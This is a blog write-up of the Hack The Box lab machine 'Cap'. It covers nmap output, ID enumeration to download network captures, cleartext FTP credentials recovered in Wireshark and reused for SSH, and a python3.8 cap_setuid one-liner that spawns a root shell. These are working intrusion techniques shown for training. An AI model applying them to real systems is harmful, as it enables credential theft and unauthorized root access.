HTB - Cap Writeup

Liam Geyer
  2025-04-28 2025-04-28 Created   2025-05-01 19:25:46 2025-05-01 19:25:46 Updated   

๐Ÿ‘พ Machine Overview

This is a writeup of the machine Cap from HTB, itโ€™s an easy difficulty Linux machine which featured IDOR, PCAP forensics, and exploiting a Linux capability.

๐Ÿ” Enumeration

I started off with an Nmap scan of the box:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
nmap -sV -sC -T4 -Pn 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-28 17:40 EDT
Nmap scan report for 10.10.10.245
Host is up (0.050s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Mon, 28 Apr 2025 21:40:46 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 28 Apr 2025 21:40:41 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 28 Apr 2025 21:40:41 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds

We can see SSH, FTP, and Web.

๐Ÿ“‚ FTP

I checked for anonymous FTP without any success.

We can see from our scan that this is running vsftpd 3.0.3. I found this exploit but itโ€™s just a DOS.

๐ŸŒ Web

Moving on to the website, weโ€™re greeted with a fancy little security dashboard.

Homepage

Thereโ€™s some interesting pages including ip and netstat output.

IP Page

Netstat page

Whatโ€™s really interesting is the โ€œSecurity Snapshotโ€ tab. Each time we browse to this page weโ€™re given the opportunity to download a random network capture.

PCAP Page

Itโ€™s not really IDOR because thereโ€™s no authentication for this app - but we can tumble the numerical ID here to find new PCAPs.

Burp Intruder

Using Burp Intruder we can tumble the values to discover that thereโ€™s 12 PCAP files. I used the following command to download them all.

1
for i in {0..13}; do wget "http://10.10.10.245/download/$i"; done

Opening them in Wireshark, I saw cleartext credentials for Nathanโ€™s FTP account.

Cleartext FTP Creds

We can use these to SSH in as Nathan and grab the user flag

โซ Privesc

As Nathan I dropped and ran LinPEAS which flagged some interesting Linux capabilities. Capabilities can let a binary perform a privileged action without being run as root or having full permissions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Capabilities
โ•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
โ•โ•โ•ฃ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=

โ•š Parent process capabilities
CapInh:       0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Notably we see /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip. This means that the Python binary can be used to manipulate itโ€™s own process ID to impersonate the root user.

We can run the following command to upgrade to a root shell and grab the flag.

1
2
3
4
5
nathan@cap:~$ python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:~# whoami
root
root@cap:~# cat /root/root.txt 
[SNIPPED]

YIPPEE!!!!

  • Title: HTB - Cap Writeup
  • Author: Liam Geyer
  • Created at : 2025-04-28 00:00:00
  • Updated at : 2025-05-01 19:25:46
  • Link: https://lfgberg.org/2025/04/28/htb/cap/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
HTB - Cap Writeup
  1. ๐Ÿ‘พ Machine Overview
  2. ๐Ÿ” Enumeration
  3. ๐Ÿ“‚ FTP
  4. ๐ŸŒ Web
  5. โซ Privesc